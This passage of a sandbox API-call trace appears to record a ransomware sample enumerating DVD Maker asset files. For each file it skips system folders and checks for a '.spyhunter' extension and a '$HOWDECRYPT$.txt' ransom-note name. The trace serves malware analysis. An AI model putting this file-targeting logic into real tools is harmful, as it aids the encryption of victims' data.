25 [0092.853] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 74 [0092.853] StrStrIW (lpFirst="Notes_LOOP_BG_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.853] lstrcmpW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.853] lstrcmpW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 74 [0092.853] GetProcessHeap () returned 0x2c0000 [0092.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346648 [0092.853] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.853] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.853] lstrcmpiW (lpString1="Pets_btn-back-over-select.png", lpString2="Windows") returned -1 [0092.853] lstrlenW (lpString="Windows") returned 7 [0092.853] lstrcmpiW (lpString1="Pets_btn-back-over-select.png", lpString2="$Recycle.bin") returned 1 [0092.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.853] lstrcmpiW (lpString1="Pets_btn-back-over-select.png", lpString2="System Volume Information") returned -1 [0092.853] lstrlenW (lpString="System Volume Information") returned 25 [0092.853] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png") returned 82 [0092.853] StrStrIW (lpFirst="Pets_btn-back-over-select.png", lpSrch=".spyhunter") returned 0x0 [0092.853] lstrcmpW (lpString1="Pets_btn-back-over-select.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.853] lstrcmpW (lpString1="Pets_btn-back-over-select.png", lpString2="_uninstalling_.png") returned 1 [0092.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png") returned 82 [0092.853] GetProcessHeap () returned 0x2c0000 [0092.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f148 [0092.853] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.854] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.854] lstrcmpiW (lpString1="Pets_btn-back-static.png", lpString2="Windows") returned -1 [0092.854] lstrlenW (lpString="Windows") returned 7 [0092.854] lstrcmpiW (lpString1="Pets_btn-back-static.png", lpString2="$Recycle.bin") returned 1 [0092.854] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.854] lstrcmpiW (lpString1="Pets_btn-back-static.png", lpString2="System Volume Information") returned -1 [0092.854] lstrlenW (lpString="System Volume Information") returned 25 [0092.854] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png") returned 77 [0092.854] StrStrIW (lpFirst="Pets_btn-back-static.png", lpSrch=".spyhunter") returned 0x0 [0092.854] lstrcmpW (lpString1="Pets_btn-back-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.854] lstrcmpW (lpString1="Pets_btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0092.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png") returned 77 [0092.854] GetProcessHeap () returned 0x2c0000 [0092.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3782a8 [0092.854] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.856] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.856] lstrcmpiW (lpString1="Pets_btn-next-over-select.png", lpString2="Windows") returned -1 [0092.856] lstrlenW (lpString="Windows") returned 7 [0092.856] lstrcmpiW (lpString1="Pets_btn-next-over-select.png", lpString2="$Recycle.bin") returned 1 [0092.856] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.856] lstrcmpiW (lpString1="Pets_btn-next-over-select.png", lpString2="System Volume Information") returned -1 [0092.856] lstrlenW (lpString="System Volume Information") returned 25 [0092.856] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png") returned 82 [0092.856] StrStrIW (lpFirst="Pets_btn-next-over-select.png", lpSrch=".spyhunter") returned 0x0 [0092.856] lstrcmpW (lpString1="Pets_btn-next-over-select.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.856] lstrcmpW (lpString1="Pets_btn-next-over-select.png", lpString2="_uninstalling_.png") returned 1 [0092.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png") returned 82 [0092.856] GetProcessHeap () returned 0x2c0000 [0092.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f058 [0092.856] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.856] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.856] lstrcmpiW (lpString1="Pets_btn-next-static.png", lpString2="Windows") returned -1 [0092.857] lstrlenW (lpString="Windows") returned 7 [0092.857] lstrcmpiW (lpString1="Pets_btn-next-static.png", lpString2="$Recycle.bin") returned 1 [0092.857] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.857] lstrcmpiW (lpString1="Pets_btn-next-static.png", lpString2="System Volume Information") returned -1 [0092.857] lstrlenW (lpString="System Volume Information") returned 25 [0092.857] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png") returned 77 [0092.857] StrStrIW (lpFirst="Pets_btn-next-static.png", lpSrch=".spyhunter") returned 0x0 [0092.857] lstrcmpW (lpString1="Pets_btn-next-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.857] lstrcmpW (lpString1="Pets_btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0092.857] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png") returned 77 [0092.857] GetProcessHeap () returned 0x2c0000 [0092.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377f08 [0092.857] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.857] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.857] lstrcmpiW (lpString1="Pets_btn-over-DOT.png", lpString2="Windows") returned -1 [0092.857] lstrlenW (lpString="Windows") returned 7 [0092.857] lstrcmpiW (lpString1="Pets_btn-over-DOT.png", lpString2="$Recycle.bin") returned 1 [0092.857] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.857] lstrcmpiW (lpString1="Pets_btn-over-DOT.png", lpString2="System Volume Information") returned -1 [0092.857] lstrlenW (lpString="System Volume Information") returned 25 [0092.857] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png") returned 74 [0092.857] StrStrIW (lpFirst="Pets_btn-over-DOT.png", lpSrch=".spyhunter") returned 0x0 [0092.857] lstrcmpW (lpString1="Pets_btn-over-DOT.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.857] lstrcmpW (lpString1="Pets_btn-over-DOT.png", lpString2="_uninstalling_.png") returned 1 [0092.857] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png") returned 74 [0092.858] GetProcessHeap () returned 0x2c0000 [0092.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346808 [0092.858] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0092.858] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.858] lstrcmpiW (lpString1="Pets_btn-previous-over-select.png", lpString2="Windows") returned -1 [0092.858] lstrlenW (lpString="Windows") returned 7 [0092.858] lstrcmpiW (lpString1="Pets_btn-previous-over-select.png", lpString2="$Recycle.bin") returned 1 [0092.858] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.858] lstrcmpiW (lpString1="Pets_btn-previous-over-select.png", lpString2="System Volume Information") returned -1 [0092.858] lstrlenW (lpString="System Volume Information") returned 25 [0092.858] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png") returned 86 [0092.859] StrStrIW (lpFirst="Pets_btn-previous-over-select.png", lpSrch=".spyhunter") returned 0x0 [0092.859] lstrcmpW (lpString1="Pets_btn-previous-over-select.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.859] lstrcmpW (lpString1="Pets_btn-previous-over-select.png", lpString2="_uninstalling_.png") returned 1 [0092.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png") returned 86 [0092.859] GetProcessHeap () returned 0x2c0000 [0092.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x3554a8 [0092.859] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0092.859] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.859] lstrcmpiW (lpString1="Pets_btn-previous-static.png", lpString2="Windows") returned -1 [0092.859] lstrlenW (lpString="Windows") returned 7 [0092.859] lstrcmpiW (lpString1="Pets_btn-previous-static.png", lpString2="$Recycle.bin") returned 1 [0092.859] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.859] lstrcmpiW (lpString1="Pets_btn-previous-static.png", lpString2="System Volume Information") returned -1 [0092.859] lstrlenW (lpString="System Volume Information") returned 25 [0092.859] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png") returned 81 [0092.859] StrStrIW (lpFirst="Pets_btn-previous-static.png", lpSrch=".spyhunter") returned 0x0 [0092.859] lstrcmpW (lpString1="Pets_btn-previous-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.859] lstrcmpW (lpString1="Pets_btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0092.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png") returned 81 [0092.859] GetProcessHeap () returned 0x2c0000 [0092.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f508 [0092.860] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0092.860] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.860] lstrcmpiW (lpString1="Pets_frame-border.png", lpString2="Windows") returned -1 [0092.860] lstrlenW (lpString="Windows") returned 7 [0092.860] lstrcmpiW (lpString1="Pets_frame-border.png", lpString2="$Recycle.bin") returned 1 [0092.860] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.860] lstrcmpiW (lpString1="Pets_frame-border.png", lpString2="System Volume Information") returned -1 [0092.860] lstrlenW (lpString="System Volume Information") returned 25 [0092.860] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png") returned 74 [0092.860] StrStrIW (lpFirst="Pets_frame-border.png", lpSrch=".spyhunter") returned 0x0 [0092.860] lstrcmpW (lpString1="Pets_frame-border.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.860] lstrcmpW (lpString1="Pets_frame-border.png", lpString2="_uninstalling_.png") returned 1 [0092.860] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png") returned 74 [0092.860] GetProcessHeap () returned 0x2c0000 [0092.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346c68 [0092.860] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0092.860] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.860] lstrcmpiW (lpString1="Pets_frame-highlight.png", lpString2="Windows") returned -1 [0092.860] lstrlenW (lpString="Windows") returned 7 [0092.860] lstrcmpiW (lpString1="Pets_frame-highlight.png", lpString2="$Recycle.bin") returned 1 [0092.860] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.860] lstrcmpiW (lpString1="Pets_frame-highlight.png", lpString2="System Volume Information") returned -1 [0092.861] lstrlenW (lpString="System Volume Information") returned 25 [0092.861] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png") returned 77 [0092.861] StrStrIW (lpFirst="Pets_frame-highlight.png", lpSrch=".spyhunter") returned 0x0 [0092.861] lstrcmpW (lpString1="Pets_frame-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.861] lstrcmpW (lpString1="Pets_frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0092.861] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png") returned 77 [0092.861] GetProcessHeap () returned 0x2c0000 [0092.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x378390 [0092.861] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0092.861] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.861] lstrcmpiW (lpString1="Pets_frame-imageMask.png", lpString2="Windows") returned -1 [0092.861] lstrlenW (lpString="Windows") returned 7 [0092.861] lstrcmpiW (lpString1="Pets_frame-imageMask.png", lpString2="$Recycle.bin") returned 1 [0092.861] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.864] lstrcmpiW (lpString1="Pets_frame-imageMask.png", lpString2="System Volume Information") returned -1 [0092.903] lstrlenW (lpString="System Volume Information") returned 25 [0092.903] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png") returned 77 [0092.903] StrStrIW (lpFirst="Pets_frame-imageMask.png", lpSrch=".spyhunter") returned 0x0 [0092.903] lstrcmpW (lpString1="Pets_frame-imageMask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.903] lstrcmpW (lpString1="Pets_frame-imageMask.png", lpString2="_uninstalling_.png") returned 1 [0092.903] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png") returned 77 [0092.903] GetProcessHeap () returned 0x2c0000 [0092.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377e20 [0092.903] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c0) returned 0x2c310e0 [0092.903] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.904] lstrcmpiW (lpString1="Pets_frame-shadow.png", lpString2="Windows") returned -1 [0092.904] lstrlenW (lpString="Windows") returned 7 [0092.904] lstrcmpiW (lpString1="Pets_frame-shadow.png", lpString2="$Recycle.bin") returned 1 [0092.904] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.904] lstrcmpiW (lpString1="Pets_frame-shadow.png", lpString2="System Volume Information") returned -1 [0092.904] lstrlenW (lpString="System Volume Information") returned 25 [0092.904] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png") returned 74 [0092.904] StrStrIW (lpFirst="Pets_frame-shadow.png", lpSrch=".spyhunter") returned 0x0 [0092.904] lstrcmpW (lpString1="Pets_frame-shadow.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.904] lstrcmpW (lpString1="Pets_frame-shadow.png", lpString2="_uninstalling_.png") returned 1 [0092.904] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png") returned 74 [0092.904] GetProcessHeap () returned 0x2c0000 [0092.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346aa8 [0092.904] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0092.904] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.904] lstrcmpiW (lpString1="Pets_image-frame-backglow.png", lpString2="Windows") returned -1 [0092.904] lstrlenW (lpString="Windows") returned 7 [0092.904] lstrcmpiW (lpString1="Pets_image-frame-backglow.png", lpString2="$Recycle.bin") returned 1 [0092.904] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.904] lstrcmpiW (lpString1="Pets_image-frame-backglow.png", lpString2="System Volume Information") returned -1 [0092.904] lstrlenW (lpString="System Volume Information") returned 25 [0092.904] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png") returned 82 [0092.904] StrStrIW (lpFirst="Pets_image-frame-backglow.png", lpSrch=".spyhunter") returned 0x0 [0092.904] lstrcmpW (lpString1="Pets_image-frame-backglow.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.905] lstrcmpW (lpString1="Pets_image-frame-backglow.png", lpString2="_uninstalling_.png") returned 1 [0092.905] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png") returned 82 [0092.905] GetProcessHeap () returned 0x2c0000 [0092.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f238 [0092.905] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0092.905] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.905] lstrcmpiW (lpString1="Pets_image-frame-border.png", lpString2="Windows") returned -1 [0092.905] lstrlenW (lpString="Windows") returned 7 [0092.905] lstrcmpiW (lpString1="Pets_image-frame-border.png", lpString2="$Recycle.bin") returned 1 [0092.905] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.905] lstrcmpiW (lpString1="Pets_image-frame-border.png", lpString2="System Volume Information") returned -1 [0092.905] lstrlenW (lpString="System Volume Information") returned 25 [0092.905] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png") returned 80 [0092.905] StrStrIW (lpFirst="Pets_image-frame-border.png", lpSrch=".spyhunter") returned 0x0 [0092.905] lstrcmpW (lpString1="Pets_image-frame-border.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.905] lstrcmpW (lpString1="Pets_image-frame-border.png", lpString2="_uninstalling_.png") returned 1 [0092.905] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png") returned 80 [0092.905] GetProcessHeap () returned 0x2c0000 [0092.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34ee78 [0092.905] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0092.905] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.905] lstrcmpiW (lpString1="Pets_image-frame-ImageMask.png", lpString2="Windows") returned -1 [0092.905] lstrlenW (lpString="Windows") returned 7 [0092.905] lstrcmpiW (lpString1="Pets_image-frame-ImageMask.png", lpString2="$Recycle.bin") returned 1 [0092.905] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.906] lstrcmpiW (lpString1="Pets_image-frame-ImageMask.png", lpString2="System Volume Information") returned -1 [0092.906] lstrlenW (lpString="System Volume Information") returned 25 [0092.906] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png") returned 83 [0092.906] StrStrIW (lpFirst="Pets_image-frame-ImageMask.png", lpSrch=".spyhunter") returned 0x0 [0092.906] lstrcmpW (lpString1="Pets_image-frame-ImageMask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.906] lstrcmpW (lpString1="Pets_image-frame-ImageMask.png", lpString2="_uninstalling_.png") returned 1 [0092.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png") returned 83 [0092.906] GetProcessHeap () returned 0x2c0000 [0092.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f148 [0092.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0092.906] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.906] lstrcmpiW (lpString1="Pets_notes-txt-background.png", lpString2="Windows") returned -1 [0092.906] lstrlenW (lpString="Windows") returned 7 [0092.906] lstrcmpiW (lpString1="Pets_notes-txt-background.png", lpString2="$Recycle.bin") returned 1 [0092.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.906] lstrcmpiW (lpString1="Pets_notes-txt-background.png", lpString2="System Volume Information") returned -1 [0092.906] lstrlenW (lpString="System Volume Information") returned 25 [0092.906] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png") returned 82 [0092.906] StrStrIW (lpFirst="Pets_notes-txt-background.png", lpSrch=".spyhunter") returned 0x0 [0092.906] lstrcmpW (lpString1="Pets_notes-txt-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.907] lstrcmpW (lpString1="Pets_notes-txt-background.png", lpString2="_uninstalling_.png") returned 1 [0092.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png") returned 82 [0092.907] GetProcessHeap () returned 0x2c0000 [0092.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f058 [0092.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0092.907] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.907] lstrcmpiW (lpString1="rollinghills.png", lpString2="Windows") returned -1 [0092.907] lstrlenW (lpString="Windows") returned 7 [0092.907] lstrcmpiW (lpString1="rollinghills.png", lpString2="$Recycle.bin") returned 1 [0092.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.907] lstrcmpiW (lpString1="rollinghills.png", lpString2="System Volume Information") returned -1 [0092.907] lstrlenW (lpString="System Volume Information") returned 25 [0092.907] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png") returned 69 [0092.907] StrStrIW (lpFirst="rollinghills.png", lpSrch=".spyhunter") returned 0x0 [0092.907] lstrcmpW (lpString1="rollinghills.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.907] lstrcmpW (lpString1="rollinghills.png", lpString2="_uninstalling_.png") returned 1 [0092.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png") returned 69 [0092.907] GetProcessHeap () returned 0x2c0000 [0092.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e3b0 [0092.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0092.907] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.907] lstrcmpiW (lpString1="Scenes_INTRO_BG.wmv", lpString2="Windows") returned -1 [0092.907] lstrlenW (lpString="Windows") returned 7 [0092.907] lstrcmpiW (lpString1="Scenes_INTRO_BG.wmv", lpString2="$Recycle.bin") returned 1 [0092.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.908] lstrcmpiW (lpString1="Scenes_INTRO_BG.wmv", lpString2="System Volume Information") returned -1 [0092.908] lstrlenW (lpString="System Volume Information") returned 25 [0092.908] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv") returned 72 [0092.908] StrStrIW (lpFirst="Scenes_INTRO_BG.wmv", lpSrch=".spyhunter") returned 0x0 [0092.908] lstrcmpW (lpString1="Scenes_INTRO_BG.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.908] lstrcmpW (lpString1="Scenes_INTRO_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv") returned 72 [0092.908] GetProcessHeap () returned 0x2c0000 [0092.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346b88 [0092.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0092.908] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.908] lstrcmpiW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="Windows") returned -1 [0092.908] lstrlenW (lpString="Windows") returned 7 [0092.908] lstrcmpiW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.908] lstrcmpiW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.908] lstrlenW (lpString="System Volume Information") returned 25 [0092.908] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv") returned 76 [0092.908] StrStrIW (lpFirst="Scenes_INTRO_BG_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.908] lstrcmpW (lpString1="Scenes_INTRO_BG_PAL.wmv", 